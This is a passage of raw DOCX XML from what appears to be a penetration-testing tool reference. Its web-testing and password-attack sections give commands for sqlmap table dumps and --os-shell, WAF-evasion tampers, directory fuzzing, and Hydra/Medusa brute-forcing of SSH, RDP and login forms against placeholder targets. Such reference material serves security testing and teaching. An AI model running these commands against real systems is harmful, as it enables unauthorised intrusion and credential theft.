        <w:t xml:space="preserve">Web Application Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="thick" w:color="22c55e" w:sz="12" w:space="6"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="f3f4f6" w:val="clear"/>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools for testing web applications for OWASP Top 10 and other web vulnerabilities.</w:t>
      </w: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Burp Suite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Proxy &amp; Interception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Industry-standard integrated platform for web application security testing with proxy, scanner, intruder, and repeater modules.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burpsuite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Start Burp Suite with the graphical user interface. On first launch, accept the temporary project option or create a new project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burpsuite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java -jar burpsuite_community.jar --headless --config-file=project.json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 Burp Suite from a JAR file in headless mode using a saved project configuration. Useful for scripted or CI pipelines.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java -jar /opt/BurpSuiteCommunity/burpsuite_community.jar --headless --config-file=/home/kali/burp_project.json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Preferences → Network Settings → Manual proxy: 127.0.0.1 port 8080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Point your browser to the Burp listener so all HTTP/S traffic passes through the proxy. In Firefox: Menu → Settings → Network Settings → Manual proxy configuration → HTTP Proxy 127.0.0.1, Port 8080.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# Alternatively use an env var for curl:
curl -x http://127.0.0.1:8080 http://target.htb/api/v1/users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http://burpsuite  →  download cacert.der  →  Import in browser certificate store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Navigate to http://burpsuite (while browser proxy is set) to download the Burp CA cert. Import it into your browser's trusted certificate authorities to intercept HTTPS traffic without SSL warnings.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# For system-level trust on Kali:
sudo cp cacert.der /usr/local/share/ca-certificates/burp-ca.crt
sudo update-ca-certificates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Intercept and modify live HTTP/S requests to test input validation and access controls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Fuzz parameters for SQL injection, XSS, and other injection flaws using Intruder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Brute-force login forms by replaying credential lists through Intruder with payload sets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Scan REST and GraphQL APIs for security misconfigurations and injection vulnerabilities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 IDOR vulnerabilities by manipulating resource identifiers in Repeater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Detect and exploit SSRF by injecting internal hostnames into request parameters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sqlmap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Injection Testing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Open-source penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities.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sqlmap -u "&lt;url&gt;"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Test a URL with a query parameter for SQL injection. sqlmap will automatically detect and test injectable parameters.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sqlmap -u "http://target.htb/items.php?id=1"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sqlmap -u "&lt;url&gt;" --dbs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 all database names accessible via the injection point.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sqlmap -u "http://target.htb/items.php?id=1" --dbs --batch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sqlmap -u "&lt;url&gt;" -D &lt;database&gt; --tables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 all table names inside a specific database.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sqlmap -u "http://target.htb/items.php?id=1" -D shopdb --tables --batch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sqlmap -u "&lt;url&gt;" -D &lt;database&gt; -T &lt;table&gt; --dump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Extract all rows from the specified table. Use -C to limit to specific columns.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sqlmap -u "http://target.htb/items.php?id=1" -D shopdb -T users --dump --batch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sqlmap -u "&lt;url&gt;" --data="&lt;post_body&gt;"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Test parameters sent in the POST body. Separate parameters with &amp; just as in a normal form submission.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sqlmap -u "http://target.htb/login.php" --data="username=admin&amp;password=test" --batch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sqlmap -u "&lt;url&gt;" --cookie="&lt;cookie&gt;"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Test session cookies or other cookie values for SQL injection.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sqlmap -u "http://target.htb/dashboard.php" --cookie="session=eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiZ3Vlc3QifQ." --batch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sqlmap -u "&lt;url&gt;" --os-shell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Attempt to obtain an interactive OS shell by leveraging database user privileges (requires DBA/root database account and FILE privilege).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sqlmap -u "http://target.htb/items.php?id=1" --os-shell --batch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sqlmap -u "&lt;url&gt;" --tamper=&lt;script&gt;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Apply a tamper script to obfuscate payloads and evade web application firewalls. Multiple tamper scripts can be chained with commas.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sqlmap -u "http://target.htb/items.php?id=1" --tamper=space2comment,between --level=3 --risk=2 --batch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-u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Target URL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--batch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Never ask for user input; use default behaviour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--random-agent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 a random HTTP User-Agent header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Automate SQL injection detection across large numbers of parameters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Extract credential tables (users, passwords) from vulnerable web databases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Escalate from SQLi to remote code execution via --os-shell on misconfigured DB servers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Test login forms and authenticated endpoints using captured session cookies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 and exploit time-based blind SQLi where no output is reflected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Bypass WAFs and input filters during authorised penetration tests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dirb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Directory &amp; File Enumeration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Web content scanner that brute-forces directories and files on web servers using wordlists.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dirb &lt;url&gt;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Scan the target URL using the built-in common.txt wordlist. Results show HTTP status codes and content lengths.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dirb http://target.htb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dirb &lt;url&gt; &lt;wordlist&gt;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 a specific wordlist file instead of the default. The SecLists and dirb big.txt lists are popular choices.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dirb http://target.htb /usr/share/dirb/wordlists/big.txt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dirb &lt;url&gt; &lt;wordlist&gt; -z -o &lt;outfile&gt;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Continue scanning even when HTTP errors are encountered (-z) and save all results to a text file (-o).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dirb http://target.htb /usr/share/dirb/wordlists/common.txt -z -o /home/kali/dirb_results.txt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dirb &lt;url&gt; -c "&lt;cookie&gt;" -a "&lt;user-agent&gt;"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Authenticate with a session cookie and spoof the User-Agent header to avoid simple bot detection.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dirb http://target.htb/admin/ -c "PHPSESSID=abc123def456" -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"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-z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Do not stop on errors (ignore HTTP errors and continue)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-o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Save output to a file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-a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Specify a custom User-Agent string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-c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Set a cookie for authenticated scanning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-r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Do not search recursively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Silent mode — only print found paths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Discover hidden admin panels, backup files, and configuration pages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Enumerate API endpoints and version paths on web applications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Find forgotten upload directories or log file locations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Quickly map an application's directory structure during initial reconnaissance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Gobuster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Directory &amp; File Enumeration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Fast directory, DNS, and virtual-host brute-forcing tool written in Go with multi-threaded performance.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gobuster dir -u &lt;url&gt; -w &lt;wordlist&gt;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Enumerate directories and files at the target URL. Use -x to add file extensions.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gobuster dir -u http://target.htb -w /usr/share/wordlists/dirb/common.txt -x php,html,txt -t 50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gobuster dns -d &lt;domain&gt; -w &lt;wordlist&gt;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Resolve each wordlist entry as a subdomain of the target domain to discover valid subdomains.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gobuster dns -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 30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gobuster vhost -u &lt;url&gt; -w &lt;wordlist&gt;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Fuzz the Host HTTP header to discover virtual hosts served from the same IP address.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gobuster vhost -u http://10.10.11.20 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain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gobuster fuzz -u "&lt;url_with_FUZZ&gt;" -w &lt;wordlist&gt;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Replace the FUZZ placeholder in the URL with each wordlist entry. Useful for parameter value enumeration.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gobuster fuzz -u "http://target.htb/index.php?page=FUZZ" -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt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gobuster dir -u &lt;url&gt; -w &lt;wordlist&gt; -s "200,204,301,302" -o &lt;outfile&gt;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Only show specific HTTP status codes and write matching results to a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gobuster dir -u http://target.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s "200,204,301,302,307,401,403" -o /home/kali/gobuster_out.txt -t 40 -q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-u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Target URL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-w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Path to wordlist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-x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File extensions to append (comma-separated)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Number of concurrent threads (default 10)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Fast directory and file brute-forcing during web application recon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Subdomain discovery to expand attack surface on a target domain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Virtual host enumeration when multiple sites share the same IP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Enumerate API versioning paths such as /api/v1/, /api/v2/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Find backup and configuration files by appending extensions like .bak, .conf, .old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ffuf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Fuzzing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Fast web fuzzer written in Go using the FUZZ keyword as a flexible placeholder for any part of an HTTP request.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ffuf -u &lt;url&gt;/FUZZ -w &lt;wordlist&gt;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Replace FUZZ in the URL path with each wordlist entry to discover directories and files.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ffuf -u http://target.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -mc 200,204,301,302,307 -t 40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ffuf -u &lt;url&gt; -H "Host: FUZZ.&lt;domain&gt;" -w &lt;wordlist&gt;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Fuzz the Host header to discover virtual hosts and subdomains. Filter out the default response size with -fs.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ffuf -u http://10.10.11.20 -H "Host: FUZZ.target.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 185 -t 50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ffuf -u "&lt;url&gt;?param=FUZZ" -w &lt;wordlist&gt;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Fuzz the value of a GET parameter to test for LFI, open redirects, SSRF, or enumeration.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ffuf -u "http://target.htb/index.php?page=FUZZ" -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -mc 200 -fs 1234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ffuf -u &lt;url&gt; -d "&lt;post_data_with_FUZZ&gt;" -H "Content-Type: application/x-www-form-urlencoded" -w &lt;wordlist&gt;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Fuzz values inside a POST request body. Useful for login brute-force or hidden field enumeration.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ffuf -u http://target.htb/login.php -d "username=admin&amp;password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -w /usr/share/wordlists/rockyou.txt -fc 200 -fs 1523 -t 30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-u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Target URL with FUZZ placeholder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-w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Wordlist path (use - for stdin)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-mc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Match HTTP status codes (comma-separated)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-fc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Filter (exclude) HTTP status codes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-fs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Filter responses by size in bytes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Number of concurrent threads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Directory and file discovery with flexible response filtering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Virtual host and subdomain enumeration via Host header fuzzing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Parameter value fuzzing for LFI, SSRF, and open redirect vulnerabilities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Login brute-force over HTTP POST with size-based response filtering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wfuzz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Fuzzing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Python-based web application fuzzer supporting multiple injection points and advanced response filtering.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wfuzz -c -w &lt;wordlist&gt; --hc 404 &lt;url&gt;/FUZZ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Enumerate directories by hiding 404 responses. -c enables colour output.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wfuzz -c -w /usr/share/wordlists/dirb/common.txt --hc 404 http://target.htb/FUZZ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wfuzz -c -w &lt;users_wordlist&gt; -w &lt;pass_wordlist&gt; -d "user=FUZZ&amp;pass=FUZ2Z" --hc 200 &lt;url&gt;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 two payload positions (FUZZ and FUZ2Z) to simultaneously fuzz username and password fields in a POST form.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wfuzz -c -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt -w /usr/share/wordlists/rockyou.txt -d "username=FUZZ&amp;password=FUZ2Z" --hc 200 http://target.htb/login.php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wfuzz -c -w &lt;wordlist&gt; --hh &lt;chars&gt; &lt;url&gt;/FUZZ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Hide all responses whose body length equals the specified number of characters. Useful when a "not found" page always has the same length.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wfuzz -c -w /usr/share/wordlists/dirb/big.txt --hh 4287 http://target.htb/FUZZ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wfuzz -c -w &lt;wordlist&gt; -b "&lt;cookie&gt;" --hc 302,403 &lt;url&gt;/FUZZ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Pass a session cookie to fuzz authenticated areas of a web application.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wfuzz -c -w /usr/share/wordlists/dirb/common.txt -b "PHPSESSID=9a2f3e8b1c47d" --hc 302,403 http://target.htb/admin/FUZZ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-w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Wordlist file path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-z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Payload type and value (e.g., -z file,wordlist.txt)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--hc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Hide responses with these HTTP status codes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--hl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Hide responses with this number of lines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--hw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Hide responses with this number of words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POST body data with FUZZ placeholder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-b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Cookie string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-H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Custom HTTP header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Brute-force web directories and files with granular response filtering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Credential stuffing and login brute-force using dual payload positions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Fuzz API endpoints with multiple simultaneous fuzzing points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 hidden parameters by fuzzing query string keys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WhatWeb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Fingerprinting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Web application fingerprinting tool that identifies technologies, CMS platforms, frameworks, and server software.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whatweb &lt;url&gt;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Perform a single-request fingerprint of the target. Returns CMS, server, language, and plugin information.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whatweb http://target.htb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whatweb -a 3 &lt;url&gt;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Increase aggression to level 3 for more thorough fingerprinting. Makes additional targeted requests to extract version information.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whatweb -a 3 -v http://target.htb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whatweb --log-json=&lt;outfile&gt; &lt;url&gt;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Write scan results as structured JSON for further processing or integration into reporting tools.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whatweb --log-json=/home/kali/whatweb_target.json -a 3 http://target.htb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-a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Aggression level 1–4 (default 1; 3 = aggressive; 4 = heavy)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-v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Verbose output — show all matched plugin details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Log errors to a file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--log-json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Save output in JSON format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--user-agent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Set a custom User-Agent string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Technology stack fingerprinting during initial web application reconnaissance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 outdated CMS versions (e.g., WordPress 4.x) with known public exploits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Discover third-party plugins and libraries to assess supply chain risk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Bulk scan multiple hosts to map technology distribution across an estate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wafw00f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Fingerprinting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Web Application Firewall detection and fingerprinting tool that identifies WAF products in front of a web server.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wafw00f &lt;url&gt;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Send probe requests to the target and identify the WAF product if one is present.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wafw00f http://target.htb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wafw00f --list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 all WAF vendors and products that wafw00f can fingerprint. Useful for knowing coverage before testing.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wafw00f --list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wafw00f -a &lt;url&gt;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 all detection methods and report every WAF that matches rather than exiting on the first match. More thorough but generates more traffic.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wafw00f -a https://target.com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-a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Find all WAF matches rather than stopping at the first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-r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Do not follow HTTP redirects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Test mode — show HTTP responses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-v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Verbose output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--list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 all WAF products wafw00f can detect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Determine whether a WAF is protecting a target before launching injection attacks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Choose appropriate sqlmap tamper scripts based on detected WAF vendor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Map WAF coverage across a large estate using bulk scanning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Validate WAF deployment and rule effectiveness during a security assessment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commix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Injection Testing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Automated OS command injection testing tool that detects and exploits command injection vulnerabilities in web applications.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commix --url="&lt;url&gt;"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Test all parameters in the URL for OS command injection vulnerabilities. commix will automatically detect the injection type.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commix --url="http://target.htb/ping.php?ip=127.0.0.1" --batch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commix --url="&lt;url&gt;" --cookie="&lt;cookie&gt;"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Test cookie values for command injection. Useful when user input is stored in cookies and later passed to a system call.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commix --url="http://target.htb/profile.php" --cookie="user=admin; theme=default" --batch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commix --url="&lt;url&gt;" --technique=T --level=3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Force time-based blind injection testing at the highest level when standard output-based methods are filtered.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commix --url="http://target.htb/search.php?q=test" --technique=T --level=3 --batch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--url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Target URL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--cookie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HTTP Cookie header value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--data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POST body data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--level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Test level 1–3 (default 1)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--technique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Injection technique: C (classic), T (time), F (file)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--os-cmd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Execute a single OS command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--batch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Never ask for user input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Detect OS command injection in web form inputs, search boxes, and ping utilities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Escalate from command injection to a full reverse shell on the target server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Test API endpoints that pass user input to system() or exec() calls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Assess IoT web interfaces where OS command injection is common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XSStrike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Injection Testing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Advanced XSS detection suite with a built-in crawler, fuzzer, and intelligent payload generator to identify reflected, stored, and DOM XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Install: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="d1d5db" w:sz="4" w:space="4"/>
          <w:bottom w:val="single" w:color="d1d5db" w:sz="4" w:space="4"/>
          <w:left w:val="thick" w:color="22c55e" w:sz="12" w:space="4"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="f1f5f9" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1e293b"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone https://github.com/s0md3v/XSStrike.git &amp;&amp; cd XSStrike &amp;&amp; pip3 install -r requirements.txt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python3 xsstrike.py -u "&lt;url&gt;"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Test all parameters in the given URL for reflected and DOM XSS vulnerabilities.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python3 xsstrike.py -u "http://target.htb/search.php?q=test"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python3 xsstrike.py -u "&lt;url&gt;" --crawl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Automatically crawl the application starting from the given URL and test every discovered page for XSS.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python3 xsstrike.py -u "http://target.htb" --crawl --seeds /home/kali/seeds.txt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python3 xsstrike.py --file-path &lt;file&gt;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Read a newline-separated list of URLs from a file and test each for XSS. Useful when scanning many endpoints discovered via spidering.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python3 xsstrike.py --file-path /home/kali/urls.txt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-u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Target URL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--crawl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Crawl the target and test all discovered links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--data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POST body data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--headers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Custom HTTP headers (JSON format)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--file-path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File containing list of URLs to test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--seeds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File of seed URLs for the crawler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Detect reflected, stored, and DOM-based XSS in web application parameters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Bypass XSS filters and WAF rules with context-aware payload generation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Crawl and audit an entire web application for XSS sinks in a single run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Generate proof-of-concept XSS payloads for inclusion in penetration test reports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="22c55e"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Password Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="thick" w:color="22c55e" w:sz="12" w:space="6"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="f3f4f6" w:val="clear"/>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Password cracking, brute forcing, and credential testing tools.</w:t>
      </w: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John the Ripper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Hash Cracking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Fast and versatile offline password cracker supporting hundreds of hash types with dictionary, rule-based, and brute-force modes.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john &lt;hashfile&gt;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Automatically detect the hash format and attempt to crack using the built-in wordlist and rules.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john /home/kali/hashes.txt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john --wordlist=&lt;wordlist&gt; &lt;hashfile&gt;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 a wordlist file as the candidate password source. rockyou.txt is the standard starting point.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john --wordlist=/usr/share/wordlists/rockyou.txt /home/kali/hashes.txt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john --format=&lt;format&gt; --wordlist=&lt;wordlist&gt; &lt;hashfile&gt;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Specify the exact hash type when auto-detection fails or gives wrong results.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john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt /home/kali/shadow.txt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john --wordlist=&lt;wordlist&gt; --rules &lt;hashfile&gt;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Apply John's built-in word mangling rules (capitalise, append numbers/special chars, leet-speak) to every wordlist entry.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john --wordlist=/usr/share/wordlists/rockyou.txt --rules /home/kali/hashes.txt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john --show &lt;hashfile&gt;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 all passwords cracked in previous sessions. The cracked results are stored in john.pot.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john --show /home/kali/hashes.txt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john --incremental &lt;hashfile&gt;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Perform a pure brute-force attack cycling through all character combinations. Slow but exhaustive.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john --incremental=Digits --fork=4 /home/kali/hashes.txt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--wordlist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Path to wordlist file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--format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Force a specific hash format (e.g., md5crypt, sha512crypt, ntlm)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--rules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Apply word-mangling rules to wordlist entries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--show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 all cracked passwords from a session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--incremental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 incremental (brute-force) mode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--fork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Fork N processes for parallel cracking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--session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Name the session for later restoration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--restore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Restore a previously saved session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--list=formats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 all supported hash formats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Crack /etc/shadow password hashes obtained from a compromised Linux system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Recover NTLM password hashes dumped from Windows SAM or memory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Break password-protected ZIP, PDF, and Office document files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Audit password strength in an organisation's Active Directory hash dump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Combine with custom rules to crack passwords matching known policies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Hashcat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Hash Cracking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World's fastest GPU-accelerated password recovery tool supporting 350+ hash types and multiple attack modes.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hashcat -m &lt;hash_type&gt; -a 0 &lt;hashfile&gt; &lt;wordlist&gt;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 each password in the wordlist against the hashes. The most common starting attack.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hashcat -m 0 -a 0 /home/kali/hashes.txt /usr/share/wordlists/rockyou.txt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hashcat -m &lt;hash_type&gt; -a 3 &lt;hashfile&gt; &lt;mask&gt;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Generate candidates matching a pattern mask. Use mask characters to represent character classes.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hashcat -m 0 -a 3 /home/kali/hashes.txt "?u?l?l?l?d?d?d?d"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hashcat -m &lt;hash_type&gt; -a 1 &lt;hashfile&gt; &lt;wordlist1&gt; &lt;wordlist2&gt;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Combine every word from wordlist1 with every word from wordlist2 to produce candidates.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hashcat -m 1000 -a 1 /home/kali/ntlm_hashes.txt /home/kali/firstnames.txt /home/kali/surnames.txt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hashcat -m &lt;hash_type&gt; &lt;hashfile&gt; &lt;wordlist&gt; --show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 hashes that have already been cracked and stored in the potfile without re-running the attack.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hashcat -m 0 /home/kali/hashes.txt /usr/share/wordlists/rockyou.txt --show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hashcat -b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 a benchmark of all supported hash types to measure GPU cracking speed. Useful for estimating attack duration.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hashcat -b -m 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hashcat -m &lt;hash_type&gt; -a 0 &lt;hashfile&gt; &lt;wordlist&gt; -r &lt;rulesfile&gt;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Apply a rules file to transform each wordlist word (append numbers, toggle case, leet-speak) before testing.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hashcat -m 0 -a 0 /home/kali/hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule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-m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Hash type (e.g., 0=MD5, 1000=NTLM, 1800=sha512crypt, 3200=bcrypt)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-a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Attack mode (0=dict, 1=combo, 3=mask, 6=hybrid dict+mask)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-o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Output cracked passwords to a file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--show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 previously cracked passwords from hashcat.potfile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--force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Ignore warnings (e.g., missing GPU drivers — not recommended in production)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-r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Apply a rules file to wordlist entries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-w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Workload profile 1–4 (4 = nightmare; use 2 for background)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--increment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Enable mask increment mode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--increment-min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Minimum mask length for increment mode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--increment-max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Maximum mask length for increment mode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GPU-accelerated cracking of NTLM hashes from Windows AD domain dump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Recover bcrypt passwords from stolen web application databases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Mask-based attacks against passwords conforming to known complexity policies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Crack NetNTLMv2 hashes captured with Responder on an internal network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Benchmark GPU hardware to estimate cracking times before starting large jobs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Hydra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Online Brute-Force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Fast and flexible online brute-force tool supporting over 50 protocols including SSH, FTP, HTTP, RDP, SMB, and many more.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hydra -l &lt;user&gt; -P &lt;passlist&gt; &lt;target_ip&gt; ssh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Brute-force SSH login for a known username against a single target.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hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.105 ssh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hydra -L &lt;userlist&gt; -P &lt;passlist&gt; &lt;target_ip&gt; ftp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Try all combinations of usernames and passwords from files against an FTP service.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hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.105 ftp -t 10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hydra -l &lt;user&gt; -P &lt;passlist&gt; &lt;target&gt; http-post-form "&lt;path&gt;:&lt;body&gt;:&lt;fail_string&gt;"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Brute-force an HTTP login form. The module string has three colon-delimited parts: form path, POST body with ^USER^/^PASS^ placeholders, and the failure indicator string.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hydra -l admin -P /usr/share/wordlists/rockyou.txt target.htb http-post-form "/login:username=^USER^&amp;password=^PASS^:Invalid credentials"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hydra -l &lt;user&gt; -P &lt;passlist&gt; &lt;target_ip&gt; rdp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Attack a Windows Remote Desktop Protocol service. Use -t 4 as RDP does not handle many concurrent connections well.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hydra -l administrator -P /usr/share/wordlists/rockyou.txt 192.168.1.110 rdp -t 4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hydra -L &lt;userlist&gt; -P &lt;passlist&gt; -M &lt;targets_file&gt; &lt;protocol&gt;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Test multiple target hosts listed one per line in a file. All targets are attacked concurrently.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hydra -L /home/kali/users.txt -P /home/kali/passwords.txt -M /home/kali/targets.txt ssh -t 8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hydra -l &lt;user&gt; -P &lt;passlist&gt; -t &lt;threads&gt; -V &lt;target_ip&gt; &lt;protocol&gt;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 a rate-limited, verbose attack to monitor each attempt. Use -f to stop on the first successful credential.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hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 4 -V -f 192.168.1.105 ssh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-l / -L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Single login username / file of usernames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 / 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Single password / file of passwords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Number of parallel tasks per target (default 16)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-V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Verbose — show each username:password attempt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-f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Exit after the first found login/password pair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Custom port number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-o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Write found credentials to a file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Brute-force SSH services on discovered network hosts during an internal pentest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Attack web application login forms during authorised web application testing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Test default credential exposure on network devices (routers, switches, printers)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Credential stuffing against FTP, SMTP, and database services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Validate password policy enforcement by testing lockout thresholds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Medusa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Online Brute-Force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Speedy, parallel, and modular login brute-forcer supporting many network services as an alternative to Hydra.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medusa -h &lt;host&gt; -u &lt;user&gt; -P &lt;passlist&gt; -M ssh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Attack SSH with a single username and a password list.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medusa -h 192.168.1.105 -u root -P /usr/share/wordlists/rockyou.txt -M ssh -t 4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medusa -h &lt;host&gt; -U &lt;userlist&gt; -P &lt;passlist&gt; -M http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Attack HTTP Basic Authentication on a web server.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medusa -h target.htb -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin/ -t 10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medusa -h &lt;host&gt; -u &lt;user&gt; -P &lt;passlist&gt; -M ftp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Attempt FTP login using a password wordlist against a single username.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medusa -h 192.168.1.105 -u ftp -P /usr/share/wordlists/rockyou.txt -M ftp -t 4 -v 6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medusa -h &lt;host&gt; -U &lt;userlist&gt; -P &lt;passlist&gt; -M smbnt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Brute-force Windows SMB authentication using the smbnt module.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medusa -h 192.168.1.110 -U /home/kali/users.txt -P /home/kali/passwords.txt -M smbnt -t 4 -f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-h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Target host IP or hostname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-u / -U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Single username / file of usernames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 / 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Single password / file of passwords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-M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Module (protocol) to use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Number of concurrent tasks per host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-f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Stop cracking after first valid credential found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Custom port number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-v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Verbosity level (e.g., -v 6 for max detail)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Parallel brute-force of multiple protocols on internal network hosts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Test FTP, SSH, and SMB services for weak or default credentials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Validate network service credential policies during infrastructure pentests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Crunch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Wordlist Generation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Wordlist generator that creates custom lists based on length ranges, character sets, and pattern templates.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crunch &lt;min-len&gt; &lt;max-len&gt; &lt;charset&gt;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Generate all combinations of characters from the charset between min and max length.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crunch 6 8 abcdefghijklmnopqrstuvwxyz0123456789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crunch &lt;min-len&gt; &lt;max-len&gt; &lt;chars&gt; -o &lt;outfile&gt;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Restrict candidates to a specific set of characters and save directly to a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crunch 4 6 0123456789 -o /home/kali/pin_list.txt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crunch &lt;len&gt; &lt;len&gt; -t &lt;pattern&gt;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Generate words matching a fixed pattern. Useful when part of the password is known (e.g., company name + 4 digits).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crunch 10 10 -t "Company%%%%" -o /home/kali/pattern_list.txt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crunch &lt;min&gt; &lt;max&gt; &lt;charset&gt; | john --stdin &lt;hashfile&gt;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Pipe crunch output directly into John the Ripper via stdin to avoid writing a large wordlist to disk.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crunch 4 4 0123456789 | john --stdin /home/kali/hashes.txt --format=raw-md5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min-len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Minimum password length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max-len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Maximum password length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charset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Character set string (inline or charset file name)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Pattern template (@ = lower, , = upper, % = digit, ^ = special)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-o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Output file path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-b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Maximum output file size (e.g., 100mb)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-c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Number of lines per output file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Starting string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Generate targeted PIN lists for known numeric-only passwords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Create custom wordlists when a password policy is known (e.g., 8 chars, upper + lower + digit)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Produce pattern wordlists based on company name and common suffixes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Pipe generated passwords into Hydra or John to avoid large disk writes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CeWL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Wordlist Generation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Custom wordlist generator that spiders a website and extracts unique words to build a target-specific password list.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cewl &lt;url&gt; -w &lt;outfile&gt;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Spider the URL to default depth 2 and write unique words to a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cewl http://target.htb -w /home/kali/cewl_wordlist.txt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cewl &lt;url&gt; -d &lt;depth&gt; -m &lt;min_length&gt; -w &lt;outfile&gt;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Spider deeper and filter out very short words to reduce noise.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cewl http://target.htb -d 3 -m 6 -w /home/kali/cewl_wordlist.txt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cewl &lt;url&gt; -e -w &lt;outfile&gt;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Include email addresses found on the website in the output — useful for username enumeration as well as password candidates.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cewl http://target.htb -e -d 2 -m 5 -w /home/kali/cewl_emails.txt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Crawl depth (default 2)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-m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Minimum word length (default 3)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-w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Output wordlist file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--email (-e)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Include email addresses found on the site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--meta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Extract metadata from downloaded files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-a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Include numbers (off by default)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Build a target-specific wordlist for a spear-phishing or password-spray attack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Supplement rockyou.txt with organisation-specific terms before cracking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Harvest email addresses from a target website for username lists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Collect product names and jargon from a corporate site for a custom dictionary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hash-identifier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Hash Analysis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Interactive tool that identifies the likely hash algorithm used to produce a given hash string.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hash-identifier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Launch the interactive prompt and paste a hash to identify it. Type QUIT to exit.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hash-identifier
# At the prompt paste: 5f4dcc3b5aa765d61d8327deb882cf99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"&lt;hash&gt;" | hash-identifier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Pipe a hash directly to hash-identifier for quick non-interactive identification. The tool will print likely matches and exit.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"5f4dcc3b5aa765d61d8327deb882cf99" | hash-identifier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 the algorithm of an unknown hash before selecting a cracking tool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Determine the correct -m value for hashcat or --format value for John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Quick analysis of hashes discovered in a database dump or config file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="22c55e"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireless Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="thick" w:color="22c55e" w:sz="12" w:space="6"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="f3f4f6" w:val="clear"/>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
